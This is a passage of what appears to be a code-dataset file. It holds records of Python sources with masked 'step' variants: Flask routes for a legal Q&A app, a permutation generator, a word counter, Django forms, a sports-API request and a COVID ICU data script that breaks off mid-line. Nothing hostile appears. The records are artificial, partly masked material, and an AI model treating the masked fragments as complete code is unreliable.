xrange(len(costs) + 1)])\n return result\n\ndef obj(times, B, cum_F, costs, dt=1.):\n '''Objective Function for Hillclimbing'''\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\ndef barrier(times, path, BTG):\n '''Handles Linear/causality Constraints with respect to transitions'''\n t = [0] + list(times)\n S = 0.\n for i in xrange(len(path) - 1):\n edge = (path[i], path[i + 1])\n tau = BTG[edge]\n S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is voilated\n return S\n",
"step-ids": [
16,
17,
22,
23,
24
]
}
|
[
16,
17,
22,
23,
24
] |
"""
Routes and views for the flask application.
"""
from datetime import datetime
from flask import render_template, redirect, url_for, request, jsonify
from athena_App import app
from athena_App.formClass import QuestionForm
import time
# Attention:
# this module includes a large word vector which needs a lot of time to load;
# turn it off when you are debugging other modules
#
#from athena_App.data_process.es_QAsearch import *
#
#from athena_App.data_process.keywordCompare import Keyword_Compare, Answer
#from athena_App.data_process.word2vecCompareModel import *
#from athena_App.data_process.graph_query import *
#from athena_App.openlaw.graphOfcase_query_echart import *
#reconstruct series
from athena_App.layer_frontInteracting.qa_module import answerFinder
from athena_App.layer_frontInteracting.kg_module import knowledgeSearch
from athena_App.layer_frontInteracting.case_module import caseQuery
@app.route('/QAsearch', methods=['POST','GET'])
def QAsearch():
"""Renders the QAsearch page."""
question = ''
form = QuestionForm()
question = form.question.data
if form.validate_on_submit():
return redirect(url_for('answer',word=question))
return render_template(
'QAsearch.html',
title = 'QAsearch Page',
year = datetime.now().year,
form = form,
question = question
)
@app.route('/instruction')
def instruction():
"""Renders the instruction page."""
return render_template(
'instruction.html',
title='说明',
year=datetime.now().year,
message='Instruction'
)
@app.route('/about')
def about():
"""Renders the about page."""
return render_template(
'about.html',
title='About',
year=datetime.now().year,
message='Your application description page.'
)
@app.route('/answer/<word>')
def answer(word):
"""Renders the answer page"""
print(word)
    start=time.perf_counter()
finder=answerFinder()
answer=finder.findANDpack(word)
    end=time.perf_counter()
print(str(end-start))
return render_template(
'answer.html',
title='Answer',
answer=answer
)
@app.route('/main')
@app.route('/')
def main():
return render_template(
'newMain.html',
title = 'Welcome Page',
year = datetime.now().year
)
@app.route('/graph_search',methods=['get','post'])
def graph_search():
return render_template(
'graph_search.html',
title = 'Graph search page',
year = datetime.now().year)
@app.route('/knowledge_search',methods=['get','post'])
def knowledge_search():
#initialize graph search object
searchKnowledge=knowledgeSearch()
des=request.args.get('description')
json_data=searchKnowledge.getTotalData_forKnowledgeSearch(des)
print(json_data)
return jsonify(json_data)
@app.route('/case_search_Test',methods=['get','post'])
def case_search_Test():
return render_template(
'case_search_Test.html',
title = 'Case search page',
year = datetime.now().year)
@app.route('/case_graph_search',methods=['get','post'])
def case_graph_search():
caseDes=request.args.get('caseDes')
#initialize graph search object
case_graph_result=caseQuery(caseDes)
pre_json_data=case_graph_result.getData()
print(pre_json_data)
return jsonify(pre_json_data)
@app.route('/knife',methods=['get','post'])
def knife():
return render_template(
'knife.html',
title = 'KNIFE SEARCH',
year = datetime.now().year
)
@app.route('/searchAll',methods=['get','post'])
def searchAll():
pass
|
normal
|
{
"blob_id": "3457a7c080da041ad279239bd6a3d214a3b8e49f",
"index": 6695,
"step-1": "<mask token>\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n<mask token>\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-2": "<mask token>\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template('about.html', title='About', year=datetime.now()\n .year, message='Your application description page.')\n\n\n<mask token>\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-3": "<mask token>\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template('about.html', title='About', year=datetime.now()\n .year, message='Your application description page.')\n\n\n@app.route('/answer/<word>')\ndef answer(word):\n \"\"\"Renders the answer page\"\"\"\n print(word)\n start = time.clock()\n finder = answerFinder()\n answer = finder.findANDpack(word)\n end = time.clock()\n print(str(end - start))\n return render_template('answer.html', title='Answer', answer=answer)\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-4": "<mask token>\nfrom datetime import datetime\nfrom flask import render_template, redirect, url_for, request, jsonify\nfrom athena_App import app\nfrom athena_App.formClass import QuestionForm\nimport time\nfrom athena_App.layer_frontInteracting.qa_module import answerFinder\nfrom athena_App.layer_frontInteracting.kg_module import knowledgeSearch\nfrom athena_App.layer_frontInteracting.case_module import caseQuery\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template('about.html', title='About', year=datetime.now()\n .year, message='Your application description page.')\n\n\n@app.route('/answer/<word>')\ndef answer(word):\n \"\"\"Renders the answer page\"\"\"\n print(word)\n start = time.clock()\n finder = answerFinder()\n answer = finder.findANDpack(word)\n end = time.clock()\n print(str(end - start))\n return render_template('answer.html', title='Answer', answer=answer)\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-5": "\"\"\"\nRoutes and views for the flask application.\n\"\"\"\n\nfrom datetime import datetime\nfrom flask import render_template, redirect, url_for, request, jsonify\nfrom athena_App import app\nfrom athena_App.formClass import QuestionForm\n\nimport time\n\n#attention:\n#this module include large word vector which need a lot of time to load\n#turn it off when when you debugging other module\n#\n#from athena_App.data_process.es_QAsearch import *\n#\n\n#from athena_App.data_process.keywordCompare import Keyword_Compare, Answer\n#from athena_App.data_process.word2vecCompareModel import *\n\n#from athena_App.data_process.graph_query import *\n\n#from athena_App.openlaw.graphOfcase_query_echart import *\n\n#reconstruct series\n\nfrom athena_App.layer_frontInteracting.qa_module import answerFinder\nfrom athena_App.layer_frontInteracting.kg_module import knowledgeSearch\nfrom athena_App.layer_frontInteracting.case_module import caseQuery\n\n\n@app.route('/QAsearch', methods=['POST','GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer',word=question))\n return render_template(\n 'QAsearch.html',\n title = 'QAsearch Page',\n year = datetime.now().year,\n form = form,\n question = question\n )\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template(\n 'instruction.html',\n title='说明',\n year=datetime.now().year,\n message='Instruction'\n )\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template(\n 'about.html',\n title='About',\n year=datetime.now().year,\n message='Your application description page.'\n )\n\n@app.route('/answer/<word>')\ndef answer(word):\n \"\"\"Renders the answer page\"\"\"\n print(word)\n start=time.clock()\n finder=answerFinder()\n answer=finder.findANDpack(word)\n end=time.clock()\n print(str(end-start))\n return render_template(\n 'answer.html',\n title='Answer',\n answer=answer\n )\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template(\n 'newMain.html',\n title = 'Welcome Page',\n year = datetime.now().year\n )\n\n@app.route('/graph_search',methods=['get','post'])\ndef graph_search():\n return render_template(\n 'graph_search.html',\n title = 'Graph search page',\n year = datetime.now().year)\n\n@app.route('/knowledge_search',methods=['get','post'])\ndef knowledge_search():\n\n #initialize graph search object\n searchKnowledge=knowledgeSearch()\n\n des=request.args.get('description')\n json_data=searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n\n return jsonify(json_data)\n\n@app.route('/case_search_Test',methods=['get','post'])\ndef case_search_Test():\n return render_template(\n 'case_search_Test.html',\n title = 'Case search page',\n year = datetime.now().year)\n\n@app.route('/case_graph_search',methods=['get','post'])\ndef case_graph_search():\n\n caseDes=request.args.get('caseDes')\n #initialize graph search object\n case_graph_result=caseQuery(caseDes)\n\n pre_json_data=case_graph_result.getData()\n print(pre_json_data)\n\n return jsonify(pre_json_data)\n\n@app.route('/knife',methods=['get','post'])\ndef knife():\n return render_template(\n 'knife.html',\n title = 'KNIFE SEARCH',\n year = datetime.now().year\n )\n\n@app.route('/searchAll',methods=['get','post'])\ndef searchAll():\n pass",
"step-ids": [
9,
10,
11,
12,
13
]
}
|
[
9,
10,
11,
12,
13
] |
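A self-contained sketch of the redirect-then-render pattern used by the QAsearch/answer views in the row above. It deliberately avoids the athena_App imports, so the /answer handler below is a stub, not the project's answerFinder.

from flask import Flask, jsonify, redirect, url_for

app = Flask(__name__)

@app.route('/answer/<word>')
def answer(word):
    # stand-in for answerFinder().findANDpack(word)
    return jsonify({'question': word, 'answer': 'stub answer'})

@app.route('/ask/<word>')
def ask(word):
    # mirrors QAsearch(): on success, redirect to the answer view
    return redirect(url_for('answer', word=word))

if __name__ == '__main__':
    with app.test_client() as client:
        resp = client.get('/ask/contract', follow_redirects=True)
        print(resp.get_json())   # {'answer': 'stub answer', 'question': 'contract'}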
from . import scramsha1, scrammer
|
normal
|
{
"blob_id": "8c336edddadbf4689721b474c254ded061ecf4b5",
"index": 743,
"step-1": "<mask token>\n",
"step-2": "from . import scramsha1, scrammer\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
def get_perms(string):
toRtn = []
freq_table = count_letters(string)
get_perms_helper(freq_table, "", len(string), toRtn)
return toRtn
def count_letters(string):
freq = {}
for letter in string:
if letter not in freq:
freq[letter] = 0
freq[letter] += 1
return freq
def get_perms_helper(freq_table, prefix, remaining, result):
if remaining == 0:
result.append(prefix)
return
for letter in freq_table:
count = freq_table[letter]
if count > 0:
freq_table[letter] -= 1
get_perms_helper(freq_table, prefix + letter, remaining - 1, result)
freq_table[letter] = count
print(get_perms("aaab"))
|
normal
|
{
"blob_id": "719a993e1f5c5d1e803b04a5561373f2b9a5a5c2",
"index": 8524,
"step-1": "def get_perms(string):\n toRtn = []\n freq_table = count_letters(string)\n get_perms_helper(freq_table, \"\", len(string), toRtn)\n return toRtn\n\ndef count_letters(string):\n freq = {}\n for letter in string:\n if letter not in freq:\n freq[letter] = 0\n freq[letter] += 1\n return freq\n\ndef get_perms_helper(freq_table, prefix, remaining, result):\n if remaining == 0:\n result.append(prefix)\n return\n \n for letter in freq_table:\n count = freq_table[letter]\n if count > 0:\n freq_table[letter] -= 1\n get_perms_helper(freq_table, prefix + letter, remaining - 1, result)\n freq_table[letter] = count\n\nprint get_perms(\"aaab\")",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
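Quick usage check for the permutation functions in the row above (Python 3); it assumes the three functions are defined in the same file.

perms = get_perms('aaab')
print(len(perms))      # 4, i.e. 4!/3! distinct orderings
print(sorted(perms))   # ['aaab', 'aaba', 'abaa', 'baaa']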
import re
from collections import defaultdict
def count_words(sentence):
# extract all the words as per definition
sentence = re.findall(r"\b[\w'-]+\b", sentence.lower().replace('_', ' '))
counts = defaultdict(lambda: 0)
# Counting the frequency of each words
for word in sentence:
counts[word] += 1
return counts
|
normal
|
{
"blob_id": "7f5f16ea10980e0ade7357cdae38f47f8d7cdf01",
"index": 2446,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n",
"step-3": "import re\nfrom collections import defaultdict\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n",
"step-4": "import re\nfrom collections import defaultdict\n\ndef count_words(sentence):\n # extract all the words as per definition\n sentence = re.findall(r\"\\b[\\w'-]+\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda: 0)\n\n # Counting the frequency of each words\n for word in sentence:\n counts[word] += 1\n \n return counts\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
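Usage sketch for count_words above; the sample sentence is made up, and the expected mapping follows from the row's regex (apostrophes and hyphens kept inside words, underscores treated as separators).

words = count_words("Joe can't tell between 'large' and large.")
print(dict(words))
# {'joe': 1, "can't": 1, 'tell': 1, 'between': 1, 'large': 2, 'and': 1}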
from django import forms
from django.forms import widgets
# from product.models import PRODUCT_OTHER_CHOICE, PRODUCT_CATEGORY_CHOICES
PRODUCT_OTHER_CHOICE = 'other'
PRODUCT_CATEGORY_CHOICES = (
(PRODUCT_OTHER_CHOICE, 'Разное'),
('food', 'Еда'),
('drink', 'Вода'),
('cloth', 'Одежда'),
('electronics', 'Электроника')
)
class ProductForm(forms.Form):
name = forms.CharField(max_length=100, label='Наименование')
description = forms.CharField(max_length=2000, required=True, label='Описание', widget=forms.Textarea)
category = forms.ChoiceField(required=False, widget=forms.Select, choices=PRODUCT_CATEGORY_CHOICES, label='Категория')
amount = forms.IntegerField(min_value=0, label='Остаток')
price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')
class FindForm(forms.Form):
name = forms.CharField(max_length=100, label='Наименование')
|
normal
|
{
"blob_id": "e8a024796b6426e572571e46030678e90c537229",
"index": 7549,
"step-1": "<mask token>\n\n\nclass ProductForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-2": "<mask token>\n\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label=\n 'Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select,\n choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-3": "<mask token>\nPRODUCT_OTHER_CHOICE = 'other'\nPRODUCT_CATEGORY_CHOICES = (PRODUCT_OTHER_CHOICE, 'Разное'), ('food', 'Еда'), (\n 'drink', 'Вода'), ('cloth', 'Одежда'), ('electronics', 'Электроника')\n\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label=\n 'Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select,\n choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-4": "from django import forms\nfrom django.forms import widgets\nPRODUCT_OTHER_CHOICE = 'other'\nPRODUCT_CATEGORY_CHOICES = (PRODUCT_OTHER_CHOICE, 'Разное'), ('food', 'Еда'), (\n 'drink', 'Вода'), ('cloth', 'Одежда'), ('electronics', 'Электроника')\n\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label=\n 'Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select,\n choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-5": "from django import forms\nfrom django.forms import widgets\n# from product.models import PRODUCT_OTHER_CHOICE, PRODUCT_CATEGORY_CHOICES\n\nPRODUCT_OTHER_CHOICE = 'other'\nPRODUCT_CATEGORY_CHOICES = (\n (PRODUCT_OTHER_CHOICE, 'Разное'),\n ('food', 'Еда'),\n ('drink', 'Вода'),\n ('cloth', 'Одежда'),\n ('electronics', 'Электроника')\n)\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label='Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select, choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
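A minimal validation sketch for ProductForm above. It assumes Django is installed; the bare settings.configure() call is just enough to use the form outside a project, the import path shop.forms is hypothetical, and the sample field values are invented.

import django
from django.conf import settings

settings.configure()   # minimal setup so the form can be used outside a project
django.setup()

from shop.forms import ProductForm   # hypothetical module path for the row's form

form = ProductForm(data={
    'name': 'Tea',
    'description': 'Green tea, 100 g',
    'category': 'food',
    'amount': 5,
    'price': '4.90',
})
print(form.is_valid())             # True
print(form.cleaned_data['price'])  # Decimal('4.90')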
import http.client
import json
conn = http.client.HTTPSConnection("v3.football.api-sports.io")
headers = {
'x-rapidapi-host': "v3.football.api-sports.io",
'x-rapidapi-key': ""
}
conn.request("GET", "/teams/statistics?season=2016&team=768&league=4", headers=headers)
res = conn.getresponse()
data = res.read()
pretty = json.loads(data)
|
normal
|
{
"blob_id": "a6617934c5e6527cf59225a5d159d1ce8a33db50",
"index": 6681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nconn.request('GET', '/teams/statistics?season=2016&team=768&league=4',\n headers=headers)\n<mask token>\n",
"step-3": "<mask token>\nconn = http.client.HTTPSConnection('v3.football.api-sports.io')\nheaders = {'x-rapidapi-host': 'v3.football.api-sports.io', 'x-rapidapi-key': ''\n }\nconn.request('GET', '/teams/statistics?season=2016&team=768&league=4',\n headers=headers)\nres = conn.getresponse()\ndata = res.read()\npretty = json.loads(data)\n",
"step-4": "import http.client\nimport json\nconn = http.client.HTTPSConnection('v3.football.api-sports.io')\nheaders = {'x-rapidapi-host': 'v3.football.api-sports.io', 'x-rapidapi-key': ''\n }\nconn.request('GET', '/teams/statistics?season=2016&team=768&league=4',\n headers=headers)\nres = conn.getresponse()\ndata = res.read()\npretty = json.loads(data)\n",
"step-5": "import http.client\nimport json\n\nconn = http.client.HTTPSConnection(\"v3.football.api-sports.io\")\n\nheaders = {\n 'x-rapidapi-host': \"v3.football.api-sports.io\",\n 'x-rapidapi-key': \"\"\n }\n\nconn.request(\"GET\", \"/teams/statistics?season=2016&team=768&league=4\", headers=headers)\n\nres = conn.getresponse()\ndata = res.read()\npretty = json.loads(data)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
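A small follow-up sketch for inspecting `pretty` from the row above. The 'errors'/'response' envelope matches API-Football v3's documented shape, but treat the exact keys as an assumption, and note the row ships an empty API key, so a real key must be filled in first.

if pretty.get('errors'):
    print('request failed:', pretty['errors'])
else:
    stats = pretty.get('response', {})
    print(stats.get('team'), stats.get('league'))
    played = stats.get('fixtures', {}).get('played', {}).get('total')
    print('fixtures played:', played)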
# csv URL
url = "https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv"
# read csv from URL
import pandas as pd
import geopandas as gpd
import numpy as np
df=pd.read_csv(url,sep=";")
df.to_csv("/var/www/FlaskApp/FlaskApp/data/covid_data.csv",sep=";",index=False)
# transforming timestamps to proper DateTime format
import datetime as dt
from datetime import datetime
import time
timestamps = []
for i in df["MeldeDatum"]:
i = i.replace(".","")
i = i.replace(":","")
timestamps.append(dt.datetime.strptime(i, "%d%m%Y %H%M%S"))
df["MeldeDatum"] = timestamps
df = df.drop(["Meldedat"], axis=1)
# get List of State Names
states = list(df["Bundesland"].unique())
# append total hospitalizations to DF
l_temp = []
for a,b in zip(df["FZHosp"],df["FZICU"]):
l_temp.append(a+b)
df["Hospitalizations_total"] = l_temp
# append total ICU capacity to DF
l_temp = []
for a,b in zip(df["FZICU"],df["FZICUFree"]):
l_temp.append(a+b)
df["ICU_capacity"] = l_temp
# append ICU occupancy percentages to DF
l_temp = []
for a,b in zip(df["FZICU"],df["ICU_capacity"]):
try:
l_temp.append(100.0 * float(a)/float(b))
except ZeroDivisionError:
l_temp.append(0.0)
df["ICU_perc"] = l_temp
# create list of dataframes by Bundesland
ls_df = []
for i in states:
temp = df[df["Bundesland"]==i]
ls_df.append(temp)
# importing adm0 and adm1 shapefilesas geopandas dataframes
adm1 = gpd.read_file("/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp")
adm0 = gpd.read_file("/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp")
#writing to json
#adm1.to_file("data/austria_adm1.geojson", driver="GeoJSON")
#adm0.to_file("data/austria_adm0.geojson", driver="GeoJSON")
# save CSV after manipulating & rounding
df = df.round(1)
df.to_csv("/var/www/FlaskApp/FlaskApp/data/ICU_data.csv")
# create most recent DF for map
most_recent_date = df['MeldeDatum'].max()
df2 = df.loc[df['MeldeDatum'] == most_recent_date]
df2.to_pickle("/var/www/FlaskApp/FlaskApp/data/df2.pkl")
# join geometries with most recent data per state
df_map =gpd.read_file("/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson")
df_map["Bundesland"] = df_map["NAME_1"]
df_map = pd.merge(df2,df_map,on="Bundesland")
df_map = gpd.GeoDataFrame(df_map, geometry="geometry")
df_map.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_map.pkl")
# drop unused columns and save file in data folder
df_map.drop(["BundeslandID","GID_0","NAME_0","NAME_1","GID_1","VARNAME_1","NL_NAME_1","TYPE_1","ENGTYPE_1","CC_1","HASC_1","test_value"],axis=1).to_csv("/var/www/FlaskApp/FlaskApp/data/df_map.csv",index=False)
"""
CREATE DFs FOR UPDATE GRAPHS
"""
df_perc = pd.DataFrame({
"MeldeDatum": np.asarray(df.loc[df['Bundesland'] == "Alle"]["MeldeDatum"]),
"Alle": np.asarray(df.loc[df['Bundesland'] == "Alle"]["ICU_perc"]),
"Burgenland": np.asarray(df.loc[df["Bundesland"] == "Burgenland"]["ICU_perc"]),
"Kärnten": np.asarray(df.loc[df['Bundesland'] == "Kärnten"]["ICU_perc"]),
"Niederösterreich": np.asarray(df.loc[df["Bundesland"] == "Niederösterreich"]["ICU_perc"]),
"Oberösterreich": np.asarray(df.loc[df['Bundesland'] == "Oberösterreich"]["ICU_perc"]),
"Salzburg": np.asarray(df.loc[df["Bundesland"] == "Salzburg"]["ICU_perc"]),
"Steiermark": np.asarray(df.loc[df['Bundesland'] == "Steiermark"]["ICU_perc"]),
"Tirol": np.asarray(df.loc[df["Bundesland"] == "Tirol"]["ICU_perc"]),
"Vorarlberg": np.asarray(df.loc[df['Bundesland'] == "Vorarlberg"]["ICU_perc"]),
"Wien": np.asarray(df.loc[df["Bundesland"] == "Wien"]["ICU_perc"]),
})
df_perc.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_perc.pkl")
df_FZICU = pd.DataFrame({
"MeldeDatum": np.asarray(df.loc[df['Bundesland'] == "Alle"]["MeldeDatum"]),
"Alle": np.asarray(df.loc[df['Bundesland'] == "Alle"]["FZICU"]),
"Burgenland": np.asarray(df.loc[df["Bundesland"] == "Burgenland"]["FZICU"]),
"Kärnten": np.asarray(df.loc[df['Bundesland'] == "Kärnten"]["FZICU"]),
"Niederösterreich": np.asarray(df.loc[df["Bundesland"] == "Niederösterreich"]["FZICU"]),
"Oberösterreich": np.asarray(df.loc[df['Bundesland'] == "Oberösterreich"]["FZICU"]),
